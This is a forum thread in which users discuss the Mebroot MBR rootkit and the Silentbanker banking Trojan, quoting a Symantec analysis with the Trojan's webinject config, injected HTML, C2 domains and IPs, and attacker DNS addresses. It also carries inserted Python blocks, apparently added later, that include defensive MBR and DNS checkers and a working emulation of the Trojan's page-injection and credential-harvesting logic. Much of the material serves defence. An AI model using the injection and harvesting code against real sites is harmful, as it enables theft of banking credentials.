
New rootkit virus ??

chilloway
16 years ago

Hi - has anyone heard anything about this:

_______________________________________________________

Sneaky New Windows Virus Steals Financial Data

Warning -- a new virus is making its way around the Internet. The virus, dubbed Mebroot, lodges itself in the Master Boot Record (MBR), a part of the hard drive responsible for loading the operating system, where it is out of the reach of most anti-virus software.

The virus itself doesn't actually harm a PC, but it does load other software on the computer, including key-loggers that are triggered when a user visits any of 900 financial institutions' Web sites. The virus then captures the user's log-on information and sends it back to the virus writers, who specialize in stealing confidential information.

The virus is classified as a rootkit, meaning it hijacks the administrator functions on the computer and evades detection by normal scanning methods, in this case by hiding in the MBR. Few anti-virus programs can detect the virus, and none can remove it. Because of its location in the MBR, the virus cannot be removed once the computer has been booted.

That said, an independent company GMER has developed software that can scan for and remove the rootkit.

_________________________________________________________

I copied & pasted this from AOL. It was on it the other day & now I am nervous about going on my bank site. Is it true or just a sales pitch?

Thanks, Debbie.
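The AOL piece says the rootkit lives in the MBR and cannot be removed once the machine has booted. The check a defender actually wants is whether the boot sector's code still matches a known-good copy. Below is an added example (mine, not the article's, not GMER's method, and not Mebroot's real bytes): it parses a raw 512-byte MBR into bootstrap code and partition table, hashes only the code region, and compares that hash with a baseline recorded on a clean system. The sample sectors are constructed; the device path in read_physical_mbr is the Windows path for the first disk and is included for reference only.

```python
import hashlib
import struct

MBR_SIZE = 512
BOOT_CODE_LEN = 446           # bootstrap code occupies bytes 0..445
PART_TABLE_OFF = 446          # four 16-byte partition entries follow
PART_ENTRY_LEN = 16
BOOT_SIGNATURE = b"\x55\xaa"  # last two bytes of a valid MBR


def parse_mbr(sector: bytes) -> dict:
    """Split a raw 512-byte sector into bootstrap code and partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + i * PART_ENTRY_LEN
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4)
        status, ptype, lba_start, count = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype != 0:  # type 0 means an unused slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {"boot_code": sector[:BOOT_CODE_LEN], "partitions": partitions}


def boot_code_digest(sector: bytes) -> str:
    """SHA-256 of the bootstrap code only; the partition table is excluded on purpose,
    since a bootkit rewrites the code and leaves the table alone so the OS still boots."""
    return hashlib.sha256(parse_mbr(sector)["boot_code"]).hexdigest()


def check_mbr(sector: bytes, baseline_digest: str) -> dict:
    """Compare a freshly read MBR against a digest recorded on a known-clean system."""
    info = parse_mbr(sector)
    digest = hashlib.sha256(info["boot_code"]).hexdigest()
    return {"modified": digest != baseline_digest,
            "digest": digest,
            "partitions": info["partitions"]}


def read_physical_mbr(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Read sector 0 of the first disk (Windows device path; needs administrator rights).
    Read it from a clean boot medium rather than from the running OS: the article says
    the rootkit hides once the machine has booted, so an in-OS read may be lied to."""
    with open(device, "rb") as disk:
        return disk.read(MBR_SIZE)


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample MBR: the given bootstrap bytes, one active NTFS partition, signature."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 63, 2097152)
    table = entry + b"\x00" * (3 * PART_ENTRY_LEN)
    return code + table + BOOT_SIGNATURE


# Constructed bytes standing in for stock and tampered bootstrap code (not Mebroot's real bytes).
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c")
BASELINE_DIGEST = boot_code_digest(CLEAN_MBR)
TAMPERED_MBR = build_sample_mbr(b"\xeb\x3c\x90\x00")

if __name__ == "__main__":
    for name, mbr in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR)):
        result = check_mbr(mbr, BASELINE_DIGEST)
        print(name, "modified:", result["modified"], result["partitions"])
```

The point of hashing only the first 446 bytes is that the partition table in both sample sectors is identical; a tool that checks whether the disk "still boots" or whether the partitions look right sees nothing, while the code digest changes.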

Comments (7)

  • Pooh Bear
    16 years ago
    last modified: 9 years ago

    Nope, it's real.

    Pooh Bear
    ===============
    VANCOUVER - In what is being billed as one of the most sophisticated cyber attacks to hit the Internet, a virus has been released that gets between computer users and their banking websites, giving thieves free rein to drain accounts and wreak financial havoc on their victims.

    Dubbed the "Silentbanker," the virus is a Trojan horse computer users may unknowingly download by simply browsing the Internet. The first sign it's at work may be a bank notification warning their client has been a victim of fraud.

    More than 400 banks -- including some in Canada -- have been targeted worldwide by the virus, which operates in many languages, said Symantec, a global security company tracking the progress of the Trojan.

    "I'd have to say it is one of the most sophisticated we have seen. What makes it more dangerous is it seems to be staffed by professional software developers," said Al Huger, vice-president for security response and security services at Symantec.

    "They are writing this and maintaining it just like they would a piece of software you might buy. There is a lot of money on the line for them. It is certainly organized."

    Unlike conventional cyber banking frauds -- in which bank clients are steered to a bogus website masquerading as their own institution's online site -- Silentbanker uses the genuine bank website and is able to manipulate the user's account without the client's knowledge.

    Payments are steered into a hacker's account, or cleaned out altogether, before transactions can be encrypted.

    It can also be used to steal credit card information and passwords.

    When a banking client signs on to their banking website, the hacker is a silent third party, remaining completely hidden and making no changes at all to the site the banking client is seeing.

    All the functions, from transferring funds to paying bills or checking credit card balances, remain the same and continue to work, thereby giving the user no cause to suspect they've been compromised.

    "What they are doing is they are already on your computer, and when you type on your computer [the hackers] are sitting between your keyboard and the bank," said Huger. "They are intercepting everything you send to your bank and everything your bank sends to you.

    "It is called a man-in-the-middle attack."

    Huger said the current attack has been under way for about four days, and while he said Symantec has seen it try to infect thousands of its customers, the company's security software has stymied the attempts.

    A Symantec security team member said the virus is not just targeting large American banks, but financial institutions around the world, particularly in Europe.

    Computer users who don't have up-to-date anti-virus security software installed, or who haven't updated their web browser to fix flaws that are allowing the Trojan to proliferate, are particularly open to attack.

    "[Silentbanker] sits on the website, and unbeknownst to you it downloads to your system," said Huger, who added the hackers behind Silentbanker are probably also trying to send the virus out via e-mail.

    Huger said the download could originate from many legitimate websites.

    "It is the complete gamut -- from gaming sites to porn sites to home-craft sites," he said. "Whoever is doing this is actually breaking into a lot of legitimate sites and placing it there."

  • Pooh Bear
    16 years ago
    last modified: 9 years ago

    Here's what the Symantec website had to say about this Trojan:
    Targeting over 400 banks and having the ability to circumvent two-factor authentication are just two of the features that push Trojan.Silentbanker into the limelight. The scale and sophistication of this emerging banking Trojan is worrying, even for someone who sees banking Trojans on a daily basis.

    This Trojan downloads a configuration file that contains the domain names of over 400 banks. Not only are the usual large American banks targeted but banks in many other countries are also targeted, including France, Spain, Ireland, the UK, Finland, Turkey... the list goes on.

    The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying. The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead. Of course the Trojan ensures that the user does not notice this change by presenting the user with the details they expect to see, while all the time sending the bank the attacker's details instead. Since the user doesn't notice anything wrong with the transaction, they will enter the second authentication password, in effect handing over their money to the attackers. The Trojan intercepts all of this traffic before it is encrypted, so even if the transaction takes place over SSL the attack is still valid. Unfortunately, we were unable to reproduce exactly such a transaction in the lab. However, through analysis of the Trojan's code it can be seen that this feature is available to the attackers.

    The Trojan does not use this attack vector for all banks, however. It only uses this route when an easier route is not available. If a transaction can occur at the targeted bank using just a username and password then the Trojan will take that information, if a certificate is also required the Trojan can steal that too, if cookies are required the Trojan will steal those. In fact, even if the attacker is missing a piece of information to conduct a transaction, extra HTML can be added to the page to ask the user for that extra information. (In the example below the user is asked to enter their encryption key, in addition to the regular information.)

    Here is the login form viewed on a clean machine:

    [Image: the regular log-in screen]

    Below the form presented to an infected user is shown, the input box added by the Trojan has been marked in red:

    [Image: the log-in screen on an infected machine, with the added input box marked in red]

    When instructed, the Trojan can also redirect users to an attacker-controlled server instead of the real bank in order to perform a classic man-in-the-middle attack. Currently there is only one bank targeted in this way; however, recent updates to the Trojan change the user's DNS settings to point to an attacker-controlled server. Using this technique the Trojan can start redirecting any site to an attacker site at any time. This feature could also mean that if the Trojan is removed but the DNS settings are left unchanged then the user may still be at risk. (See below for the attackers' DNS server addresses.)

    Add to all of the above the ability to steal FTP, POP, Web mail, protected storage, and cached passwords and then we start to see the capabilities of this Trojan. But it doesn't stop there: don't forget the porn! The Trojan also contains over 600 pornographic Web site URLs that can be shown to the infected user so that the attacker can make money from the referrals.

    Lastly, the Trojan can also download updates, which it regularly does. It can also download other executables and it can use the infected machine as a proxy or as a Web server on any chosen port (in tests the http port used was 18102).

    The multiple configuration files that the Trojan downloads are updated several times per day and currently the Trojan is capable of injecting HTML into about 200 different URLs. The configuration files are compressed and encrypted; however, after decrypting them we can see how the Trojan works in more detail.

    The configuration files are structured as .ini files and each section of an .ini file represents a different task. Here is a snippet from the configuration file that was used to inject HTML into the banking form shown in the example above:

    [jhw21]
    pok=insert
    qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
    njd=name="oppasswd;
    dfr=14
    xzn=/>n
    xzq=2
    rek=<div class="clear sep4"></div>
    <label for="clave">Clave de firma: </label>
    <input name="ESpass" type="password" size="8" maxlength="8"
    class="input01 aleft w180"/>
    req=166

    The configuration options in the snippet above are as follows:

    Token   Purpose
    pok     Action to take
    qas     URL to take action on
    njd     String to search for
    xzn     End string to search for
    rek     HTML to insert

    The Trojan searches for the string name="oppasswd; then it finds the end tag /> and then it inserts the following string into the page:

    <div class="clear sep4"></div>
    <label for="clave">Clave de firma: </label>
    <input name="ESpass" type="password" size="8" maxlength="8"
    class="input01 aleft w180"/>

    Shown below is the HTML shown to the user on a non-infected computer:

    <label for="clave">Clave personal: </label>
    <input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
    class="input01 aleft w180"/>
    </div>

    And on an infected computer:

    <label for="clave">Clave personal: </label>
    <input id="clave" name="oppasswd" type="password" size="8" maxlength="8"
    class="input01 aleft w180"/>
    <div class="clear sep4"></div>
    <label for="clave">Clave de firma: </label>
    <input name="ESpass" type="password" size="8" maxlength="8"
    class="input01 aleft w180"/>
    </div>

    The Trojan can take any of the following actions when altering the HTML of a page: insert, delete, replace, and replace all. The Trojan uses the keyword "ESpass" (see the form above) as a keyword when the user sends a page to the bank and the Trojan checks if the page contains that keyword. Using this technique the Trojan can recognize pages it has altered and can extract the relevant data from the page and send it to the attacker as well as to the bank.

    The configuration files for this Trojan currently contain over 200kb of data; however, new URLs and HTML are being added to the configuration files on a daily basis. The Trojan is easily updated since the full HTML of any banking-related Web site is sent to the attackers. Using these submissions they can target banks for which they do not have bank accounts already. We are currently monitoring all of the updates to this Trojan.

    The Trojan accesses the following URLs for configuration, updates, and to send stolen data:

    iloveie.info
    webcounterstat.info
    microcbs.com
    reservaza.com
    screensaversfor-fun.com
    mystabcounter.info
    85.255.119.218

    The Trojan also downloads a copy of Trojan.Flush.J, which changes the user's DNS settings to the following attacker settings:

    85.255.116.133
    85.255.112.87

    For protection, please keep your antivirus definitions up to date and block the above addresses at the firewall.

    Note: Not only did this Trojan grab my attention for obvious reasons, but the Trojan also installed itself as a .midi driver, causing my music to stop! For the record, the Trojan adds itself to the following registry key so that it is loaded in all applications that use sound:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi1

    But it also said this:

    Discovered: December 17, 2007
    Updated: January 8, 2008 12:54:17 PM
    Also Known As: Spy-Agent.cm [McAfee]
    Type: Trojan
    Infection Length: 54,189 bytes and 98,304 bytes
    Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

    Trojan.Silentbanker is a Trojan horse that records keystrokes, captures screen images, and steals confidential financial information to send to the remote attacker.

    Protection
    Initial Rapid Release version December 17, 2007 revision 023
    Latest Rapid Release version January 10, 2008 revision 023
    Initial Daily Certified version December 17, 2007 revision 032
    Latest Daily Certified version January 15, 2008 revision 016
    Initial Weekly Certified release date December 19, 2007

    Threat Assessment
    Wild
    Wild Level: Low
    Number of Infections: 0 - 49
    Number of Sites: 0 - 2
    Geographical Distribution: Low
    Threat Containment: Moderate
    Removal: Easy
    Damage
    Damage Level: Medium
    Payload: Records keystrokes and captures screen images
    Releases Confidential Info: Steals confidential financial information
    Distribution
    Distribution Level: Low
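The Symantec write-up quoted above describes the injection mechanism precisely: each .ini section is a task; on a page whose URL matches qas, find njd, then the next xzn after it, and act there; later, when the user submits the form, the presence of the ESpass field tells the Trojan which posts came from a page it altered. The following is an added example, written by the editor and not code from Symantec or from the Trojan, that emulates that config-driven rewrite on the clean login form quoted in the post. The config text is a transcription of the [jhw21] snippet (rek joined onto one line, and the stray trailing ";" on njd read as a transcription artifact); the "insert" action follows the post exactly, while the span semantics I give delete, replace and replaceall (njd through xzn) are my assumption, since the post names those actions without defining them.

```python
import configparser
from typing import Dict, Optional
from urllib.parse import parse_qs

# Constructed config text, transcribed from the [jhw21] snippet quoted above (the
# rek HTML joined onto one line so configparser reads it as a single value).
CONFIG_TEXT = """
[jhw21]
pok=insert
qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
njd=name="oppasswd
xzn=/>
rek=<div class="clear sep4"></div><label for="clave">Clave de firma: </label><input name="ESpass" type="password" size="8" maxlength="8" class="input01 aleft w180"/>
"""

# Clean login form, as quoted in the post above.
CLEAN_HTML = ('<label for="clave">Clave personal: </label>'
              '<input id="clave" name="oppasswd" type="password" size="8" maxlength="8" '
              'class="input01 aleft w180"/></div>')

MARKER_FIELD = "ESpass"   # field name the Trojan later looks for in submitted forms


def load_tasks(text: str) -> Dict[str, dict]:
    """Each .ini section is one task: pok/qas/njd/xzn/rek as defined in the post."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}


def _span(html: str, task: dict, start_at: int = 0):
    """Locate njd, then the first xzn after it; return (start, end) or None."""
    start = html.find(task["njd"], start_at)
    if start < 0:
        return None
    end = html.find(task["xzn"], start)
    if end < 0:
        return None
    return start, end + len(task["xzn"])


def apply_task(html: str, task: dict) -> str:
    """Emulate one action. 'insert' follows the post; delete/replace/replaceall act on
    the span njd..xzn, which is an assumption about their semantics."""
    action = task["pok"]
    if action == "replaceall":
        out, pos = [], 0
        while (hit := _span(html, task, pos)) is not None:
            out.append(html[pos:hit[0]])
            out.append(task["rek"])
            pos = hit[1]
        out.append(html[pos:])
        return "".join(out)
    hit = _span(html, task)
    if hit is None:
        return html
    start, end = hit
    if action == "insert":
        return html[:end] + task["rek"] + html[end:]
    if action == "delete":
        return html[:start] + html[end:]
    if action == "replace":
        return html[:start] + task["rek"] + html[end:]
    raise ValueError(f"unknown action {action!r}")


def rewrite_page(url: str, html: str, tasks: Dict[str, dict]) -> str:
    """Apply every task whose qas matches the page URL (scheme ignored), as the Trojan
    does after the browser has decrypted the response and before it renders it."""
    target = url.split("://", 1)[-1]
    for task in tasks.values():
        if task["qas"] in target:
            html = apply_task(html, task)
    return html


def harvest(post_body: str) -> Optional[Dict[str, str]]:
    """Attacker-side check on an outgoing form post: only pages the Trojan altered
    carry the ESpass field, so its presence marks the post as worth exfiltrating."""
    fields = {k: v[0] for k, v in parse_qs(post_body).items()}
    return fields if MARKER_FIELD in fields else None


if __name__ == "__main__":
    tasks = load_tasks(CONFIG_TEXT)
    print(rewrite_page("https://someBankSite.com/xpage/loginxxxxxxxxxs.htm", CLEAN_HTML, tasks))
    print(harvest("oppasswd=hunter2&ESpass=12345678"))
```

Nothing here touches the network or the bank's real page: the injected field is added to HTML the browser already holds, which is why the post stresses that SSL does not help and why the bank's own site looks unchanged to the user.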

  • chilloway
    Original Author
    16 years ago
    last modified: 9 years ago

    Thanks PoohBear - now, I have McAfee Security Center with auto updates. My PC auto installs anything from Microsoft. Every time I get off, I run CCleaner and I use AdAware SE, Spybot & SuperAntispyware Free at least every other day.

    In the opinion of this forum - should I download & use Gmer?
    I don't want to be too paranoid, either. Thanks again, Debbie.

  • Pooh Bear
    16 years ago
    last modified: 9 years ago

    You should be able to check the list of viruses that McAfee protects against. Just look for a listing of Spy-Agent.cm and if it is listed then you should be protected against it.

    I have never used McAfee so I can't advise you as to how to check what it protects against. But since they have named it, I would guess that it is included in the antivirus definition database.

    Pooh Bear

  • zep516
    16 years ago
    last modified: 9 years ago

    Always keep Windows updated, always change your banking log-in information often, always use the most current browser available, whatever one you use. And a 2-way firewall like ZoneAlarm and others; don't simply rely on a router, and the passwords on routers should be changed also. Always check and know the status of your accounts. IF you ever think you are at risk, go to a clean computer & change your password on all accounts, go to a malware removal forum and have the PC checked by people that specialize in this work.

    A lot of back door trojans do this: they enter the system and attempt to contact a site and send your info (banking), and that's why the 2-way firewall is so important.

    Removal of these type of trojans / rootkits can be difficult and even the experts suggest reinstalling the operating system after this type of infection. A rootkit works in conjunction with the virus or Trojan and is designed to hide from scanners. Unfortunately rootkits work well.

    Keep the PC up to date, run a firewall, change your passwords, watch where you surf, run special online scans from time to time.
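Two concrete things follow from the Symantec post and from zep516's firewall advice: the Trojan.Flush.J component rewrites the machine's DNS servers to the two attacker addresses (so a cleaned machine can still be sending every lookup to the attacker), and the write-up asks for the listed addresses to be blocked at the firewall. Below is an added example (the editor's, not Symantec's or McAfee's tooling) that parses `ipconfig /all` output, flags resolvers matching the addresses quoted in the thread, and generates outbound block rules with the `netsh advfirewall` syntax of Windows Vista and later. The ipconfig sample is constructed; the indicator lists are transcribed from the post above.

```python
import ipaddress
import re
from typing import Dict, List

# Indicators transcribed from the Symantec write-up quoted earlier in the thread.
ATTACKER_DNS = {"85.255.116.133", "85.255.112.87"}
C2_INDICATORS = ["iloveie.info", "webcounterstat.info", "microcbs.com", "reservaza.com",
                 "screensaversfor-fun.com", "mystabcounter.info", "85.255.119.218"]

# Constructed sample of `ipconfig /all` output from a host whose DNS was changed.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : home
   IPv4 Address. . . . . . . . . . . : 192.168.1.20
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.116.133
                                       85.255.112.87
"""

DNS_LINE = re.compile(r"\s*DNS Servers[ .]*:\s*(\S+)")


def _is_ip(text: str) -> bool:
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def parse_dns_servers(ipconfig_text: str) -> List[str]:
    """Collect every address under 'DNS Servers', including indented continuation lines."""
    servers, in_dns = [], False
    for line in ipconfig_text.splitlines():
        m = DNS_LINE.match(line)
        if m:
            servers.append(m.group(1))
            in_dns = True
            continue
        if in_dns:
            value = line.strip()
            if value and _is_ip(value):
                servers.append(value)
                continue
            in_dns = False
    return servers


def flag_dns_servers(servers: List[str], known_bad=ATTACKER_DNS) -> List[str]:
    """Return the configured resolvers that match the attacker-controlled addresses."""
    return [s for s in servers if s in known_bad]


def firewall_block_commands(indicators: List[str]) -> List[str]:
    """Outbound block rules for Windows Firewall (netsh advfirewall, Vista and later).
    Only literal IPs become rules; hostnames are emitted as reminders, because a
    firewall rule needs an address and the names may resolve differently over time."""
    commands = []
    for item in indicators:
        if _is_ip(item):
            commands.append(f'netsh advfirewall firewall add rule name="block {item}" '
                            f'dir=out action=block remoteip={item}')
        else:
            commands.append(f"REM resolve and block manually: {item}")
    return commands


def assess(ipconfig_text: str) -> Dict[str, object]:
    """Defender-side summary: resolvers in use, which are hostile, and the block rules."""
    servers = parse_dns_servers(ipconfig_text)
    return {"dns_servers": servers,
            "hijacked": flag_dns_servers(servers),
            "block_rules": firewall_block_commands(C2_INDICATORS + sorted(ATTACKER_DNS))}


if __name__ == "__main__":
    for key, value in assess(SAMPLE_IPCONFIG).items():
        print(key, value)
```

If "hijacked" comes back non-empty, removing the Trojan is not enough: the resolver setting has to be put back to the router or ISP address, otherwise every hostname the machine looks up, the bank's included, is still answered by the attacker.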

  • chilloway
    Original Author
    16 years ago
    last modified: 9 years ago

    Whew !! Thanks everyone - I think I have it all covered but I am calling McAfee just to make sure I'm set up right & have a 2 way firewall. Pretty sure I do, though. Thanks again to all, Debbie.

  • cynandjon
    16 years ago
    last modified: 9 years ago

    I called my bank to make them aware of it, can't hurt.
